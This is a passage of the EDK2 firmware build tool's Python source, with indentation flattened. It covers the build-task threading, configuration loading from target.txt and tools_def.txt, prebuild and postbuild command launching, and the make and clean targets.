BuildTask._TaskQueue[BuildItem] = Bt
BuildTask._PendingQueueLock.acquire()
BuildTask._PendingQueue[BuildItem] = Bt
BuildTask._PendingQueueLock.release()
return Bt
## The real constructor of BuildTask
#
# @param BuildItem A BuildUnit object representing a build object
# @param Dependency The dependent build object of BuildItem
#
def _Init(self, BuildItem, Dependency=None):
self.BuildItem = BuildItem
self.DependencyList = []
if Dependency is None:
Dependency = BuildItem.Dependency
else:
Dependency.extend(BuildItem.Dependency)
self.AddDependency(Dependency)
# flag indicating build completes, used to avoid unnecessary re-build
self.CompleteFlag = False
## Check if all dependent build tasks are completed or not
#
def IsReady(self):
ReadyFlag = True
for Dep in self.DependencyList:
if Dep.CompleteFlag == True:
continue
ReadyFlag = False
break
return ReadyFlag
## Add dependent build task
#
# @param Dependency The list of dependent build objects
#
def AddDependency(self, Dependency):
for Dep in Dependency:
if not Dep.BuildObject.IsBinaryModule:
self.DependencyList.append(BuildTask.New(Dep)) # BuildTask list
## The thread wrapper of LaunchCommand function
#
# @param Command A list or string contains the call of the command
# @param WorkingDir The directory in which the program will be running
#
def _CommandThread(self, Command, WorkingDir):
try:
self.BuildItem.BuildObject.BuildTime = LaunchCommand(Command, WorkingDir)
self.CompleteFlag = True
except:
#
# TRICK: hide the output of threads left running, so that the user can
# catch the error message easily
#
if not BuildTask._ErrorFlag.isSet():
GlobalData.gBuildingModule = "%s [%s, %s, %s]" % (str(self.BuildItem.BuildObject),
self.BuildItem.BuildObject.Arch,
self.BuildItem.BuildObject.ToolChain,
self.BuildItem.BuildObject.BuildTarget
)
EdkLogger.SetLevel(EdkLogger.ERROR)
BuildTask._ErrorFlag.set()
BuildTask._ErrorMessage = "%s broken\n %s [%s]" % \
(threading.currentThread().getName(), Command, WorkingDir)
if self.BuildItem.BuildObject in GlobalData.gModuleBuildTracking and not BuildTask._ErrorFlag.isSet():
GlobalData.gModuleBuildTracking[self.BuildItem.BuildObject] = True
# indicate there's a thread is available for another build task
BuildTask._RunningQueueLock.acquire()
BuildTask._RunningQueue.pop(self.BuildItem)
BuildTask._RunningQueueLock.release()
BuildTask._Thread.release()
## Start build task thread
#
def Start(self):
EdkLogger.quiet("Building ... %s" % repr(self.BuildItem))
Command = self.BuildItem.BuildCommand + [self.BuildItem.Target]
self.BuildTread = Thread(target=self._CommandThread, args=(Command, self.BuildItem.WorkingDir))
self.BuildTread.setName("build thread")
self.BuildTread.setDaemon(False)
self.BuildTread.start()
## The class contains the information related to EFI image
#
class PeImageInfo():
## Constructor
#
# Constructor will load all required image information.
#
# @param BaseName The full file path of image.
# @param Guid The GUID for image.
# @param Arch Arch of this image.
# @param OutputDir The output directory for image.
# @param DebugDir The debug directory for image.
# @param ImageClass PeImage Information
#
def __init__(self, BaseName, Guid, Arch, OutputDir, DebugDir, ImageClass):
self.BaseName = BaseName
self.Guid = Guid
self.Arch = Arch
self.OutputDir = OutputDir
self.DebugDir = DebugDir
self.Image = ImageClass
self.Image.Size = (self.Image.Size // 0x1000 + 1) * 0x1000
## The class implementing the EDK2 build process
#
# The build process includes:
# 1. Load configuration from target.txt and tools_def.txt in $(WORKSPACE)/Conf
# 2. Parse DSC file of active platform
# 3. Parse FDF file if any
# 4. Establish build database, including parse all other files (module, package)
# 5. Create AutoGen files (C code file, depex file, makefile) if necessary
# 6. Call build command
#
class Build():
## Constructor
#
# Constructor will load all necessary configurations, parse platform, modules
# and packages and the establish a database for AutoGen.
#
# @param Target The build command target, one of gSupportedTarget
# @param WorkspaceDir The directory of workspace
# @param BuildOptions Build options passed from command line
#
def __init__(self, Target, WorkspaceDir, BuildOptions):
self.WorkspaceDir = WorkspaceDir
self.Target = Target
self.PlatformFile = BuildOptions.PlatformFile
self.ModuleFile = BuildOptions.ModuleFile
self.ArchList = BuildOptions.TargetArch
self.ToolChainList = BuildOptions.ToolChain
self.BuildTargetList= BuildOptions.BuildTarget
self.Fdf = BuildOptions.FdfFile
self.FdList = BuildOptions.RomImage
self.FvList = BuildOptions.FvImage
self.CapList = BuildOptions.CapName
self.SilentMode = BuildOptions.SilentMode
self.ThreadNumber = BuildOptions.ThreadNumber
self.SkipAutoGen = BuildOptions.SkipAutoGen
self.Reparse = BuildOptions.Reparse
self.SkuId = BuildOptions.SkuId
if self.SkuId:
GlobalData.gSKUID_CMD = self.SkuId
self.ConfDirectory = BuildOptions.ConfDirectory
self.SpawnMode = True
self.BuildReport = BuildReport(BuildOptions.ReportFile, BuildOptions.ReportType)
self.TargetTxt = TargetTxtClassObject()
self.ToolDef = ToolDefClassObject()
self.AutoGenTime = 0
self.MakeTime = 0
self.GenFdsTime = 0
GlobalData.BuildOptionPcd = BuildOptions.OptionPcd if BuildOptions.OptionPcd else []
#Set global flag for build mode
GlobalData.gIgnoreSource = BuildOptions.IgnoreSources
GlobalData.gUseHashCache = BuildOptions.UseHashCache
GlobalData.gBinCacheDest = BuildOptions.BinCacheDest
GlobalData.gBinCacheSource = BuildOptions.BinCacheSource
GlobalData.gEnableGenfdsMultiThread = BuildOptions.GenfdsMultiThread
GlobalData.gDisableIncludePathCheck = BuildOptions.DisableIncludePathCheck
if GlobalData.gBinCacheDest and not GlobalData.gUseHashCache:
EdkLogger.error("build", OPTION_NOT_SUPPORTED, ExtraData="--binary-destination must be used together with --hash.")
if GlobalData.gBinCacheSource and not GlobalData.gUseHashCache:
EdkLogger.error("build", OPTION_NOT_SUPPORTED, ExtraData="--binary-source must be used together with --hash.")
if GlobalData.gBinCacheDest and GlobalData.gBinCacheSource:
EdkLogger.error("build", OPTION_NOT_SUPPORTED, ExtraData="--binary-destination can not be used together with --binary-source.")
if GlobalData.gBinCacheSource:
BinCacheSource = os.path.normpath(GlobalData.gBinCacheSource)
if not os.path.isabs(BinCacheSource):
BinCacheSource = mws.join(self.WorkspaceDir, BinCacheSource)
GlobalData.gBinCacheSource = BinCacheSource
else:
if GlobalData.gBinCacheSource is not None:
EdkLogger.error("build", OPTION_VALUE_INVALID, ExtraData="Invalid value of option --binary-source.")
if GlobalData.gBinCacheDest:
BinCacheDest = os.path.normpath(GlobalData.gBinCacheDest)
if not os.path.isabs(BinCacheDest):
BinCacheDest = mws.join(self.WorkspaceDir, BinCacheDest)
GlobalData.gBinCacheDest = BinCacheDest
else:
if GlobalData.gBinCacheDest is not None:
EdkLogger.error("build", OPTION_VALUE_INVALID, ExtraData="Invalid value of option --binary-destination.")
if self.ConfDirectory:
# Get alternate Conf location, if it is absolute, then just use the absolute directory name
ConfDirectoryPath = os.path.normpath(self.ConfDirectory)
if not os.path.isabs(ConfDirectoryPath):
# Since alternate directory name is not absolute, the alternate directory is located within the WORKSPACE
# This also handles someone specifying the Conf directory in the workspace. Using --conf=Conf
ConfDirectoryPath = mws.join(self.WorkspaceDir, ConfDirectoryPath)
else:
if "CONF_PATH" in os.environ:
ConfDirectoryPath = os.path.normcase(os.path.normpath(os.environ["CONF_PATH"]))
else:
# Get standard WORKSPACE/Conf use the absolute path to the WORKSPACE/Conf
ConfDirectoryPath = mws.join(self.WorkspaceDir, 'Conf')
GlobalData.gConfDirectory = ConfDirectoryPath
GlobalData.gDatabasePath = os.path.normpath(os.path.join(ConfDirectoryPath, GlobalData.gDatabasePath))
self.Db = WorkspaceDatabase()
self.BuildDatabase = self.Db.BuildObject
self.Platform = None
self.ToolChainFamily = None
self.LoadFixAddress = 0
self.UniFlag = BuildOptions.Flag
self.BuildModules = []
self.HashSkipModules = []
self.Db_Flag = False
self.LaunchPrebuildFlag = False
self.PlatformBuildPath = os.path.join(GlobalData.gConfDirectory, '.cache', '.PlatformBuild')
if BuildOptions.CommandLength:
GlobalData.gCommandMaxLength = BuildOptions.CommandLength
# print dot character during doing some time-consuming work
self.Progress = Utils.Progressor()
# print current build environment and configuration
EdkLogger.quiet("%-16s = %s" % ("WORKSPACE", os.environ["WORKSPACE"]))
if "PACKAGES_PATH" in os.environ:
# WORKSPACE env has been converted before. Print the same path style with WORKSPACE env.
EdkLogger.quiet("%-16s = %s" % ("PACKAGES_PATH", os.path.normcase(os.path.normpath(os.environ["PACKAGES_PATH"]))))
EdkLogger.quiet("%-16s = %s" % ("EDK_TOOLS_PATH", os.environ["EDK_TOOLS_PATH"]))
if "EDK_TOOLS_BIN" in os.environ:
# Print the same path style with WORKSPACE env.
EdkLogger.quiet("%-16s = %s" % ("EDK_TOOLS_BIN", os.path.normcase(os.path.normpath(os.environ["EDK_TOOLS_BIN"]))))
EdkLogger.quiet("%-16s = %s" % ("CONF_PATH", GlobalData.gConfDirectory))
if "PYTHON3_ENABLE" in os.environ:
PYTHON3_ENABLE = os.environ["PYTHON3_ENABLE"]
if PYTHON3_ENABLE != "TRUE":
PYTHON3_ENABLE = "FALSE"
EdkLogger.quiet("%-16s = %s" % ("PYTHON3_ENABLE", PYTHON3_ENABLE))
if "PYTHON_COMMAND" in os.environ:
EdkLogger.quiet("%-16s = %s" % ("PYTHON_COMMAND", os.environ["PYTHON_COMMAND"]))
self.InitPreBuild()
self.InitPostBuild()
if self.Prebuild:
EdkLogger.quiet("%-16s = %s" % ("PREBUILD", self.Prebuild))
if self.Postbuild:
EdkLogger.quiet("%-16s = %s" % ("POSTBUILD", self.Postbuild))
if self.Prebuild:
self.LaunchPrebuild()
self.TargetTxt = TargetTxtClassObject()
self.ToolDef = ToolDefClassObject()
if not (self.LaunchPrebuildFlag and os.path.exists(self.PlatformBuildPath)):
self.InitBuild()
EdkLogger.info("")
os.chdir(self.WorkspaceDir)
## Load configuration
#
# This method will parse target.txt and get the build configurations.
#
def LoadConfiguration(self):
#
# Check target.txt and tools_def.txt and Init them
#
BuildConfigurationFile = os.path.normpath(os.path.join(GlobalData.gConfDirectory, gBuildConfiguration))
if os.path.isfile(BuildConfigurationFile) == True:
StatusCode = self.TargetTxt.LoadTargetTxtFile(BuildConfigurationFile)
ToolDefinitionFile = self.TargetTxt.TargetTxtDictionary[TAB_TAT_DEFINES_TOOL_CHAIN_CONF]
if ToolDefinitionFile == '':
ToolDefinitionFile = gToolsDefinition
ToolDefinitionFile = os.path.normpath(mws.join(self.WorkspaceDir, 'Conf', ToolDefinitionFile))
if os.path.isfile(ToolDefinitionFile) == True:
StatusCode = self.ToolDef.LoadToolDefFile(ToolDefinitionFile)
else:
EdkLogger.error("build", FILE_NOT_FOUND, ExtraData=ToolDefinitionFile)
else:
EdkLogger.error("build", FILE_NOT_FOUND, ExtraData=BuildConfigurationFile)
# if no ARCH given in command line, get it from target.txt
if not self.ArchList:
self.ArchList = self.TargetTxt.TargetTxtDictionary[TAB_TAT_DEFINES_TARGET_ARCH]
self.ArchList = tuple(self.ArchList)
# if no build target given in command line, get it from target.txt
if not self.BuildTargetList:
self.BuildTargetList = self.TargetTxt.TargetTxtDictionary[TAB_TAT_DEFINES_TARGET]
# if no tool chain given in command line, get it from target.txt
if not self.ToolChainList:
self.ToolChainList = self.TargetTxt.TargetTxtDictionary[TAB_TAT_DEFINES_TOOL_CHAIN_TAG]
if self.ToolChainList is None or len(self.ToolChainList) == 0:
EdkLogger.error("build", RESOURCE_NOT_AVAILABLE, ExtraData="No toolchain given. Don't know how to build.\n")
# check if the tool chains are defined or not
NewToolChainList = []
for ToolChain in self.ToolChainList:
if ToolChain not in self.ToolDef.ToolsDefTxtDatabase[TAB_TOD_DEFINES_TOOL_CHAIN_TAG]:
EdkLogger.warn("build", "Tool chain [%s] is not defined" % ToolChain)
else:
NewToolChainList.append(ToolChain)
# if no tool chain available, break the build
if len(NewToolChainList) == 0:
EdkLogger.error("build", RESOURCE_NOT_AVAILABLE,
ExtraData="[%s] not defined. No toolchain available for build!\n" % ", ".join(self.ToolChainList))
else:
self.ToolChainList = NewToolChainList
ToolChainFamily = []
ToolDefinition = self.ToolDef.ToolsDefTxtDatabase
for Tool in self.ToolChainList:
if TAB_TOD_DEFINES_FAMILY not in ToolDefinition or Tool not in ToolDefinition[TAB_TOD_DEFINES_FAMILY] \
or not ToolDefinition[TAB_TOD_DEFINES_FAMILY][Tool]:
EdkLogger.warn("build", "No tool chain family found in configuration for %s. Default to MSFT." % Tool)
ToolChainFamily.append(TAB_COMPILER_MSFT)
else:
ToolChainFamily.append(ToolDefinition[TAB_TOD_DEFINES_FAMILY][Tool])
self.ToolChainFamily = ToolChainFamily
if self.ThreadNumber is None:
self.ThreadNumber = self.TargetTxt.TargetTxtDictionary[TAB_TAT_DEFINES_MAX_CONCURRENT_THREAD_NUMBER]
if self.ThreadNumber == '':
self.ThreadNumber = 0
else:
self.ThreadNumber = int(self.ThreadNumber, 0)
if self.ThreadNumber == 0:
try:
self.ThreadNumber = multiprocessing.cpu_count()
except (ImportError, NotImplementedError):
self.ThreadNumber = 1
if not self.PlatformFile:
PlatformFile = self.TargetTxt.TargetTxtDictionary[TAB_TAT_DEFINES_ACTIVE_PLATFORM]
if not PlatformFile:
# Try to find one in current directory
WorkingDirectory = os.getcwd()
FileList = glob.glob(os.path.normpath(os.path.join(WorkingDirectory, '*.dsc')))
FileNum = len(FileList)
if FileNum >= 2:
EdkLogger.error("build", OPTION_MISSING,
ExtraData="There are %d DSC files in %s. Use '-p' to specify one.\n" % (FileNum, WorkingDirectory))
elif FileNum == 1:
PlatformFile = FileList[0]
else:
EdkLogger.error("build", RESOURCE_NOT_AVAILABLE,
ExtraData="No active platform specified in target.txt or command line! Nothing can be built.\n")
self.PlatformFile = PathClass(NormFile(PlatformFile, self.WorkspaceDir), self.WorkspaceDir)
## Initialize build configuration
#
# This method will parse DSC file and merge the configurations from
# command line and target.txt, then get the final build configurations.
#
def InitBuild(self):
# parse target.txt, tools_def.txt, and platform file
self.LoadConfiguration()
# Allow case-insensitive for those from command line or configuration file
ErrorCode, ErrorInfo = self.PlatformFile.Validate(".dsc", False)
if ErrorCode != 0:
EdkLogger.error("build", ErrorCode, ExtraData=ErrorInfo)
def InitPreBuild(self):
self.LoadConfiguration()
ErrorCode, ErrorInfo = self.PlatformFile.Validate(".dsc", False)
if ErrorCode != 0:
EdkLogger.error("build", ErrorCode, ExtraData=ErrorInfo)
if self.BuildTargetList:
GlobalData.gGlobalDefines['TARGET'] = self.BuildTargetList[0]
if self.ArchList:
GlobalData.gGlobalDefines['ARCH'] = self.ArchList[0]
if self.ToolChainList:
GlobalData.gGlobalDefines['TOOLCHAIN'] = self.ToolChainList[0]
GlobalData.gGlobalDefines['TOOL_CHAIN_TAG'] = self.ToolChainList[0]
if self.ToolChainFamily:
GlobalData.gGlobalDefines['FAMILY'] = self.ToolChainFamily[0]
if 'PREBUILD' in GlobalData.gCommandLineDefines:
self.Prebuild = GlobalData.gCommandLineDefines.get('PREBUILD')
else:
self.Db_Flag = True
Platform = self.Db.MapPlatform(str(self.PlatformFile))
self.Prebuild = str(Platform.Prebuild)
if self.Prebuild:
PrebuildList = []
#
# Evaluate all arguments and convert arguments that are WORKSPACE
# relative paths to absolute paths. Filter arguments that look like
# flags or do not follow the file/dir naming rules to avoid false
# positives on this conversion.
#
for Arg in self.Prebuild.split():
#
# Do not modify Arg if it looks like a flag or an absolute file path
#
if Arg.startswith('-') or os.path.isabs(Arg):
PrebuildList.append(Arg)
continue
#
# Do not modify Arg if it does not look like a Workspace relative
# path that starts with a valid package directory name
#
if not Arg[0].isalpha() or os.path.dirname(Arg) == '':
PrebuildList.append(Arg)
continue
#
# If Arg looks like a WORKSPACE relative path, then convert to an
# absolute path and check to see if the file exists.
#
Temp = mws.join(self.WorkspaceDir, Arg)
if os.path.isfile(Temp):
Arg = Temp
PrebuildList.append(Arg)
self.Prebuild = ' '.join(PrebuildList)
self.Prebuild += self.PassCommandOption(self.BuildTargetList, self.ArchList, self.ToolChainList, self.PlatformFile, self.Target)
def InitPostBuild(self):
if 'POSTBUILD' in GlobalData.gCommandLineDefines:
self.Postbuild = GlobalData.gCommandLineDefines.get('POSTBUILD')
else:
Platform = self.Db.MapPlatform(str(self.PlatformFile))
self.Postbuild = str(Platform.Postbuild)
if self.Postbuild:
PostbuildList = []
#
# Evaluate all arguments and convert arguments that are WORKSPACE
# relative paths to absolute paths. Filter arguments that look like
# flags or do not follow the file/dir naming rules to avoid false
# positives on this conversion.
#
for Arg in self.Postbuild.split():
#
# Do not modify Arg if it looks like a flag or an absolute file path
#
if Arg.startswith('-') or os.path.isabs(Arg):
PostbuildList.append(Arg)
continue
#
# Do not modify Arg if it does not look like a Workspace relative
# path that starts with a valid package directory name
#
if not Arg[0].isalpha() or os.path.dirname(Arg) == '':
PostbuildList.append(Arg)
continue
#
# If Arg looks like a WORKSPACE relative path, then convert to an
# absolute path and check to see if the file exists.
#
Temp = mws.join(self.WorkspaceDir, Arg)
if os.path.isfile(Temp):
Arg = Temp
PostbuildList.append(Arg)
self.Postbuild = ' '.join(PostbuildList)
self.Postbuild += self.PassCommandOption(self.BuildTargetList, self.ArchList, self.ToolChainList, self.PlatformFile, self.Target)
def PassCommandOption(self, BuildTarget, TargetArch, ToolChain, PlatformFile, Target):
BuildStr = ''
if GlobalData.gCommand and isinstance(GlobalData.gCommand, list):
BuildStr += ' ' + ' '.join(GlobalData.gCommand)
TargetFlag = False
ArchFlag = False
ToolChainFlag = False
PlatformFileFlag = False
if GlobalData.gOptions and not GlobalData.gOptions.BuildTarget:
TargetFlag = True
if GlobalData.gOptions and not GlobalData.gOptions.TargetArch:
ArchFlag = True
if GlobalData.gOptions and not GlobalData.gOptions.ToolChain:
ToolChainFlag = True
if GlobalData.gOptions and not GlobalData.gOptions.PlatformFile:
PlatformFileFlag = True
if TargetFlag and BuildTarget:
if isinstance(BuildTarget, list) or isinstance(BuildTarget, tuple):
BuildStr += ' -b ' + ' -b '.join(BuildTarget)
elif isinstance(BuildTarget, str):
BuildStr += ' -b ' + BuildTarget
if ArchFlag and TargetArch:
if isinstance(TargetArch, list) or isinstance(TargetArch, tuple):
BuildStr += ' -a ' + ' -a '.join(TargetArch)
elif isinstance(TargetArch, str):
BuildStr += ' -a ' + TargetArch
if ToolChainFlag and ToolChain:
if isinstance(ToolChain, list) or isinstance(ToolChain, tuple):
BuildStr += ' -t ' + ' -t '.join(ToolChain)
elif isinstance(ToolChain, str):
BuildStr += ' -t ' + ToolChain
if PlatformFileFlag and PlatformFile:
if isinstance(PlatformFile, list) or isinstance(PlatformFile, tuple):
BuildStr += ' -p ' + ' -p '.join(PlatformFile)
elif isinstance(PlatformFile, str):
BuildStr += ' -p' + PlatformFile
BuildStr += ' --conf=' + GlobalData.gConfDirectory
if Target:
BuildStr += ' ' + Target
return BuildStr
def LaunchPrebuild(self):
if self.Prebuild:
EdkLogger.info("\n- Prebuild Start -\n")
self.LaunchPrebuildFlag = True
#
# The purpose of .PrebuildEnv file is capture environment variable settings set by the prebuild script
# and preserve them for the rest of the main build step, because the child process environment will
# evaporate as soon as it exits, we cannot get it in build step.
#
PrebuildEnvFile = os.path.join(GlobalData.gConfDirectory, '.cache', '.PrebuildEnv')
if os.path.isfile(PrebuildEnvFile):
os.remove(PrebuildEnvFile)
if os.path.isfile(self.PlatformBuildPath):
os.remove(self.PlatformBuildPath)
if sys.platform == "win32":
args = ' && '.join((self.Prebuild, 'set > ' + PrebuildEnvFile))
Process = Popen(args, stdout=PIPE, stderr=PIPE, shell=True)
else:
args = ' && '.join((self.Prebuild, 'env > ' + PrebuildEnvFile))
Process = Popen(args, stdout=PIPE, stderr=PIPE, shell=True)
# launch two threads to read the STDOUT and STDERR
EndOfProcedure = Event()
EndOfProcedure.clear()
if Process.stdout:
StdOutThread = Thread(target=ReadMessage, args=(Process.stdout, EdkLogger.info, EndOfProcedure))
StdOutThread.setName("STDOUT-Redirector")
StdOutThread.setDaemon(False)
StdOutThread.start()
if Process.stderr:
StdErrThread = Thread(target=ReadMessage, args=(Process.stderr, EdkLogger.quiet, EndOfProcedure))
StdErrThread.setName("STDERR-Redirector")
StdErrThread.setDaemon(False)
StdErrThread.start()
# waiting for program exit
Process.wait()
if Process.stdout:
StdOutThread.join()
if Process.stderr:
StdErrThread.join()
if Process.returncode != 0 :
EdkLogger.error("Prebuild", PREBUILD_ERROR, 'Prebuild process is not success!')
if os.path.exists(PrebuildEnvFile):
f = open(PrebuildEnvFile)
envs = f.readlines()
f.close()
envs = [l.split("=", 1) for l in envs ]
envs = [[I.strip() for I in item] for item in envs if len(item) == 2]
os.environ.update(dict(envs))
EdkLogger.info("\n- Prebuild Done -\n")
def LaunchPostbuild(self):
if self.Postbuild:
EdkLogger.info("\n- Postbuild Start -\n")
if sys.platform == "win32":
Process = Popen(self.Postbuild, stdout=PIPE, stderr=PIPE, shell=True)
else:
Process = Popen(self.Postbuild, stdout=PIPE, stderr=PIPE, shell=True)
# launch two threads to read the STDOUT and STDERR
EndOfProcedure = Event()
EndOfProcedure.clear()
if Process.stdout:
StdOutThread = Thread(target=ReadMessage, args=(Process.stdout, EdkLogger.info, EndOfProcedure))
StdOutThread.setName("STDOUT-Redirector")
StdOutThread.setDaemon(False)
StdOutThread.start()
if Process.stderr:
StdErrThread = Thread(target=ReadMessage, args=(Process.stderr, EdkLogger.quiet, EndOfProcedure))
StdErrThread.setName("STDERR-Redirector")
StdErrThread.setDaemon(False)
StdErrThread.start()
# waiting for program exit
Process.wait()
if Process.stdout:
StdOutThread.join()
if Process.stderr:
StdErrThread.join()
if Process.returncode != 0 :
EdkLogger.error("Postbuild", POSTBUILD_ERROR, 'Postbuild process is not success!')
EdkLogger.info("\n- Postbuild Done -\n")
## Error handling for hash feature
#
# On BuildTask error, iterate through the Module Build tracking
# dictionary to determine wheather a module failed to build. Invalidate
# the hash associated with that module by removing it from storage.
#
#
def invalidateHash(self):
# GlobalData.gModuleBuildTracking contains only modules that cannot be skipped by hash
for moduleAutoGenObj in GlobalData.gModuleBuildTracking.keys():
# False == FAIL : True == Success
# Skip invalidating for Successful module builds
if GlobalData.gModuleBuildTracking[moduleAutoGenObj] == True:
continue
# The module failed to build or failed to start building, from this point on
# Remove .hash from build
if GlobalData.gUseHashCache:
ModuleHashFile = path.join(moduleAutoGenObj.BuildDir, moduleAutoGenObj.Name + ".hash")
if os.path.exists(ModuleHashFile):
os.remove(ModuleHashFile)
# Remove .hash file from cache
if GlobalData.gBinCacheDest:
FileDir = path.join(GlobalData.gBinCacheDest, moduleAutoGenObj.Arch, moduleAutoGenObj.SourceDir, moduleAutoGenObj.MetaFile.BaseName)
HashFile = path.join(FileDir, moduleAutoGenObj.Name + '.hash')
if os.path.exists(HashFile):
os.remove(HashFile)
## Build a module or platform
#
# Create autogen code and makefile for a module or platform, and the launch
# "make" command to build it
#
# @param Target The target of build command
# @param Platform The platform file
# @param Module The module file
# @param BuildTarget The name of build target, one of "DEBUG", "RELEASE"
# @param ToolChain The name of toolchain to build
# @param Arch The arch of the module/platform
# @param CreateDepModuleCodeFile Flag used to indicate creating code
# for dependent modules/Libraries
# @param CreateDepModuleMakeFile Flag used to indicate creating makefile
# for dependent modules/Libraries
#
def _BuildPa(self, Target, AutoGenObject, CreateDepsCodeFile=True, CreateDepsMakeFile=True, BuildModule=False, FfsCommand={}):
if AutoGenObject is None:
return False
# skip file generation for cleanxxx targets, run and fds target
if Target not in ['clean', 'cleanlib', 'cleanall', 'run', 'fds']:
# for target which must generate AutoGen code and makefile
if not self.SkipAutoGen or Target == 'genc':
self.Progress.Start("Generating code")
AutoGenObject.CreateCodeFile(CreateDepsCodeFile)
self.Progress.Stop("done!")
if Target == "genc":
return True
if not self.SkipAutoGen or Target == 'genmake':
self.Progress.Start("Generating makefile")
AutoGenObject.CreateMakeFile(CreateDepsMakeFile, FfsCommand)
self.Progress.Stop("done!")
if Target == "genmake":
return True
else:
# always recreate top/platform makefile when clean, just in case of inconsistency
AutoGenObject.CreateCodeFile(False)
AutoGenObject.CreateMakeFile(False)
if EdkLogger.GetLevel() == EdkLogger.QUIET:
EdkLogger.quiet("Building ... %s" % repr(AutoGenObject))
BuildCommand = AutoGenObject.BuildCommand
if BuildCommand is None or len(BuildCommand) == 0:
EdkLogger.error("build", OPTION_MISSING,
"No build command found for this module. "
"Please check your setting of %s_%s_%s_MAKE_PATH in Conf/tools_def.txt file." %
(AutoGenObject.BuildTarget, AutoGenObject.ToolChain, AutoGenObject.Arch),
ExtraData=str(AutoGenObject))
makefile = GenMake.BuildFile(AutoGenObject)._FILE_NAME_[GenMake.gMakeType]
# run
if Target == 'run':
RunDir = os.path.normpath(os.path.join(AutoGenObject.BuildDir, GlobalData.gGlobalDefines['ARCH']))
Command = '.\SecMain'
os.chdir(RunDir)
LaunchCommand(Command, RunDir)
return True
# build modules
if BuildModule:
BuildCommand = BuildCommand + [Target]
LaunchCommand(BuildCommand, AutoGenObject.MakeFileDir)
self.CreateAsBuiltInf()
return True
# build library
if Target == 'libraries':
for Lib in AutoGenObject.LibraryBuildDirectoryList:
NewBuildCommand = BuildCommand + ['-f', os.path.normpath(os.path.join(Lib, makefile)), 'pbuild']
LaunchCommand(NewBuildCommand, AutoGenObject.MakeFileDir)
return True
# build module
if Target == 'modules':
for Lib in AutoGenObject.LibraryBuildDirectoryList:
NewBuildCommand = BuildCommand + ['-f', os.path.normpath(os.path.join(Lib, makefile)), 'pbuild']
LaunchCommand(NewBuildCommand, AutoGenObject.MakeFileDir)
for Mod in AutoGenObject.ModuleBuildDirectoryList:
NewBuildCommand = BuildCommand + ['-f', os.path.normpath(os.path.join(Mod, makefile)), 'pbuild']
LaunchCommand(NewBuildCommand, AutoGenObject.MakeFileDir)
self.CreateAsBuiltInf()
return True
# cleanlib
if Target == 'cleanlib':
for Lib in AutoGenObject.LibraryBuildDirectoryList:
LibMakefile = os.path.normpath(os.path.join(Lib, makefile))
if os.path.exists(LibMakefile):
NewBuildCommand = BuildCommand + ['-f', LibMakefile, 'cleanall']
LaunchCommand(NewBuildCommand, AutoGenObject.MakeFileDir)
return True
# clean
if Target == 'clean':
for Mod in AutoGenObject.ModuleBuildDirectoryList:
ModMakefile = os.path.normpath(os.path.join(Mod, makefile))
if os.path.exists(ModMakefile):
NewBuildCommand = BuildCommand + ['-f', ModMakefile, 'cleanall']
LaunchCommand(NewBuildCommand, AutoGenObject.MakeFileDir)
for Lib in AutoGenObject.LibraryBuildDirectoryList:
LibMakefile = os.path.normpath(os.path.join(Lib, makefile))
if os.path.exists(LibMakefile):
NewBuildCommand = BuildCommand + ['-f', LibMakefile, 'cleanall']
LaunchCommand(NewBuildCommand, AutoGenObject.MakeFileDir)
return True
# cleanall
if Target == 'cleanall':
try:
#os.rmdir(AutoGenObject.BuildDir)
RemoveDirectory(AutoGenObject.BuildDir, True)
except WindowsError as X:
EdkLogger.error("build", FILE_DELETE_FAILURE, ExtraData=str(X))
return True
## Build a module or platform
#
# Create autogen code and makefile for a module or platform, and the launch
# "make" command to build it
#
# @param Target The target of build command
# @param Platform The platform file
# @param Module The module file
# @param BuildTarget The name of build target, one of "DEBUG", "RELEASE"
# @param ToolChain The name of toolchain to build
# @param Arch The arch of the module/platform
# @param CreateDepModuleCodeFile Flag used to indicate creating code
# for dependent modules/Libraries
# @param CreateDepModuleMakeFile Flag used to indicate creating makefile
# for dependent modules/Libraries
#
def _Build(self, Target, AutoGenObject, CreateDepsCodeFile=True, CreateDepsMakeFile=True, BuildModule=False):
if AutoGenObject is None:
return False
# skip file generation for cleanxxx targets, run and fds target
if Target not in ['clean', 'cleanlib', 'cleanall', 'run', 'fds']:
# for target which must generate AutoGen code and makefile
if not self.SkipAutoGen or Target == 'genc':
self.Progress.Start("Generating code")
AutoGenObject.CreateCodeFile(CreateDepsCodeFile)
self.Progress.Stop("done!")
if Target == "genc":
return True
if not self.SkipAutoGen or Target == 'genmake':
self.Progress.Start("Generating makefile")
AutoGenObject.CreateMakeFile(CreateDepsMakeFile)
#AutoGenObject.CreateAsBuiltInf()
self.Progress.Stop("done!")
if Target == "genmake":
return True
else:
# always recreate top/platform makefile when clean, just in case of inconsistency
AutoGenObject.CreateCodeFile(False)
AutoGenObject.CreateMakeFile(False)
if EdkLogger.GetLevel() == EdkLogger.QUIET:
EdkLogger.quiet("Building ... %s" % repr(AutoGenObject))
BuildCommand = AutoGenObject.BuildCommand
if BuildCommand is None or len(BuildCommand) == 0:
EdkLogger.error("build", OPTION_MISSING,
"No build command found for this module. "
"Please check your setting of %s_%s_%s_MAKE_PATH in Conf/tools_def.txt file." %
(AutoGenObject.BuildTarget, AutoGenObject.ToolChain, AutoGenObject.Arch),
ExtraData=str(AutoGenObject))
# build modules
if BuildModule:
if Target != 'fds':
BuildCommand = BuildCommand + [Target]
AutoGenObject.BuildTime = LaunchCommand(BuildCommand, AutoGenObject.MakeFileDir)
self.CreateAsBuiltInf()
return True
# genfds
if Target == 'fds':
if GenFdsApi(AutoGenObject.GenFdsCommandDict, self.Db):
EdkLogger.error("build", COMMAND_FAILURE)
return True
# run
if Target == 'run':
RunDir = os.path.normpath(os.path.join(AutoGenObject.BuildDir, GlobalData.gGlobalDefines['ARCH']))
Command = '.\SecMain'
os.chdir(RunDir)
LaunchCommand(Command, RunDir)
return True
# build library
if Target == 'libraries':
pass
# not build modules
# cleanall
if Target == 'cleanall':
try:
#os.rmdir(AutoGenObject.BuildDir)
RemoveDirectory(AutoGenObject.BuildDir, True)
except WindowsError as X:
EdkLogger.error("build", FILE_DELETE_FAILURE, ExtraData=str(X))
return True
## Rebase module image and Get function address for the input module list.
#
def _RebaseModule (self, MapBuffer, BaseAddress, ModuleList, AddrIsOffset = True, ModeIsSmm = False):
if ModeIsSmm:
AddrIsOffset = False
for InfFile in ModuleList:
sys.stdout.write (".")
sys.stdout.flush()
ModuleInfo = ModuleList[InfFile]
ModuleName = ModuleInfo.BaseName
ModuleOutputImage = ModuleInfo.Image.FileName
